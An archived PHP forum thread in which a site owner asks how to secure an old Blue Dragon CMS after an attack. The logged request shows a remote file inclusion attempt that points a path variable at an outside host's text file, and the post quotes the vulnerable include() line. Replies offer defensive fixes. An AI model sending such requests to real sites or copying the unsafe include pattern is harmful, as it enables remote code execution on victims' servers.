473,387 Members | 1,742 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

home > topics > php > questions > hacker's attack, please help...

Join Bytes to post your question to a community of 473,387 software developers and data experts.

Hacker's attack, please help...

My admin notified me that my site is closed till the eror is removed. My CMS
is PHPBlue Dragon (pretty old). The attack was like this (found in logs):

d198-53-20-215.abhsia.telus.net kurpiel.pl -
[01/Feb/2008:19:44:06 +0100] "GET
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://pcbcservice.com/all.txt?
HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
..NET CLR 1.1.4322)"

The above mentioned activecontent.php is:

<?php
/************************************************** *************************
* Blue Dragon CMS Platinum
* ------------------------------------
*
* script file id : activecontent.php
* begin platinum : 2004/03/01
* copyright : (C) 2003 Apache
*
* file platinum ver : 1.0
*
* This source file is part of the "Blue Dragon CMS Platinum"(Content
Management System).
*
* This file may be distributed and/or modified under the terms of the
* "Blue Dragon CMS Platinum License" version 2 as published by the
software author.
*
* This file is provided AS IS with NO WARRANTY!
************************************************** ************************/

include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$phpExt);?>Can I - rather ignorant in php - modify the file to make it hackerresistant? Many thanks
Feb 2 '08 #1
5 1835
On Sat, 02 Feb 2008 12:47:09 +0100, salonowiec
<de***********@poczta.onet.plwrote:
My admin notified me that my site is closed till the eror is removed. My
CMS is PHPBlue Dragon (pretty old). The attack was like this (found in
logs):

d198-53-20-215.abhsia.telus.net kurpiel.pl -
[01/Feb/2008:19:44:06 +0100] "GET
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://pcbcservice.com/all.txt?
HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
5.1; .NET CLR 1.1.4322)"

The above mentioned activecontent.php is:

<?php
/************************************************** *************************
* Blue Dragon CMS Platinum
*
------------------------------------
*
* script file id : activecontent.php
* begin platinum : 2004/03/01
* copyright : (C) 2003 Apache
*
* file platinum ver : 1.0
*
* This source file is part of the "Blue Dragon CMS Platinum"(Content
Management System).
*
* This file may be distributed and/or modified under the terms of the
* "Blue Dragon CMS Platinum License" version 2 as published by the
software author.
*
* This file is provided AS IS with NO WARRANTY!
************************************************** ************************/

include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$phpExt);?>Can
I - rather ignorant in php - modify the file to make it
hackerresistant? Many thanks
Register globals should be off....
And I started to type a whole story, then, for some reason, I decided to
Google this 'Blue Dragon CMS'. Here you go, one of the first hits:
<http://securitydot.net/xpl/exploits/vulnerabilities/articles/909/exploit.html>

Personally, any CMS with this kind of vulnerability, AND relying on
register_globals, has instantly lost all my trust.
--
Rik Wasmus
Feb 2 '08 #2
*** salonowiec escribió/wrote (Sat, 2 Feb 2008 12:47:09 +0100):
My admin notified me that my site is closed till the eror is removed. My CMS
is PHPBlue Dragon (pretty old). The attack was like this (found in logs):

d198-53-20-215.abhsia.telus.net kurpiel.pl -
[01/Feb/2008:19:44:06 +0100] "GET
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://pcbcservice.com/all.txt?
HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 1.1.4322)"
You can insert this code on top of activecontent.php:

if( isset($_REQUEST['vsDragonRootPath']) ){
exit;
}

However, it's pretty likely that there're some other security holes like
this so I'd consider migranting to a newer CMS in the mid term.

<?php
[...]
include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$phpExt);?>Can I - rather ignorant in php - modify the file to make it hackerresistant? Many thanks

--
-+ http://alvaro.es - Álvaro G. Vicario - Burgos, Spain
++ Mi sitio sobre programación web: http://bits.demogracia.com
+- Mi web de humor austrohúngaro: http://www.demogracia.com
--
Feb 2 '08 #3

Uzytkownik "Álvaro G. Vicario" <we*******************@demogracia.com>
napisal w wiadomosci news:rw***************************@40tude.net...
>
You can insert this code on top of activecontent.php:

if( isset($_REQUEST['vsDragonRootPath']) ){
exit;
}

However, it's pretty likely that there're some other security holes like
this so I'd consider migranting to a newer CMS in the mid term.
Thank you... I fixed my activecontent.php, there are, however more files
with same phrase include($vsDragonRootPath etc. Should I fix them either?

Feb 2 '08 #4
Should I fix them either?

No. You should do what Alvaro and Rik suggested.
Feb 2 '08 #5
Change CMS with a new one that have regular updates.
A correction for the whole site will cost you more time or money than any
other solution.
If you really need to invest time or moneys just think about migrating the
actual data to a new
(reliable) cms.

There are still other serious bugs in those scripts.
For example, anybody could identify the paths
/home.9/k/u/r/kurpiel/www/public_includes/pub_kernel/

anybody could have direct access to the system via includes and commands
execution.
Even the webserver is not well configured (maybe change webhosting too?).

You need to change/correct those scripts as soon as possible.

Regards.

L. A. Iarrusso

"salonowiec" <de***********@poczta.onet.plha scritto nel messaggio
news:fo**********@news.onet.pl...
My admin notified me that my site is closed till the eror is removed. My
CMS is PHPBlue Dragon (pretty old). The attack was like this (found in
logs):

d198-53-20-215.abhsia.telus.net kurpiel.pl -
[01/Feb/2008:19:44:06 +0100] "GET
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://pcbcservice.com/all.txt?
HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 1.1.4322)"

The above mentioned activecontent.php is:

<?php
/************************************************** *************************
* Blue Dragon CMS Platinum
* ------------------------------------
*
* script file id : activecontent.php
* begin platinum : 2004/03/01
* copyright : (C) 2003 Apache
*
* file platinum ver : 1.0
*
* This source file is part of the "Blue Dragon CMS Platinum"(Content
Management System).
*
* This file may be distributed and/or modified under the terms of the
* "Blue Dragon CMS Platinum License" version 2 as published by the
software author.
*
* This file is provided AS IS with NO WARRANTY!
************************************************** ************************/

include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$phpExt);?>Can
I - rather ignorant in php - modify the file to make it hackerresistant?
Many thanks

Feb 3 '08 #6
New Post

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

3
POSSIBLE OFF-TOPIC: hacker-type personality in corporate lifestyle
by: D E | last post by:
Hi. I am just curious how a hacker-type personality fits into a corporate lifestyle. I am only a student now. I have a govt. job now where i can go to school and work part time. I can take 2...
Java
13
dangling pointers and security
by: Aravind | last post by:
I would like to know in what manner dangling pointers affect the security of a application developed using C++.What are the loopholes that are created by dangling pointers and how they could be...
C / C++
4
Tarantulus
Tracking down a hacker (my site has been compromised)
by: Tarantulus | last post by:
Hi guys, I've been hacked. my homepage has had <script> tage inserted into it pointing to a russian site with a trojan... only problem is I don't know how, and don't know where to start...
PHP
0
How to turn on java script in a villaon keypad mobile phone
by: Charles Arthur | last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
Java
0
Basic Javascript concepts
by: aa123db | last post by:
Variable and constants Use var or let for variables and const fror constants. Var foo ='bar'; Let foo ='bar';const baz ='bar'; Functions function $name$ ($parameters$) { } ...
Javascript
0
Batch import of multiple excel files into the database
by: ryjfgjl | last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
Data Management
0
Merging data from multiple Excel files
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
Data Management
0
BarryA
Navigating the Data Structures and Algorithms (DSA)
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
Algorithms / Advanced Math
1
Is that possible of reading the .csv file in column wise and the column have different lengths ?
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
C / C++
0
marktang
What is ONU?
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
General
0
Oralloy
Problem With Comparison Operator <=> in G++
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers,...
C / C++
0
jinu1996
Maximizing Business Potential: The Nexus of Website Design and Digital Marketing
by: jinu1996 | last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
Online Marketing

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes:
Post a Job
Sponsored Posts
Platinum & Gold Sponsors
Hire Now!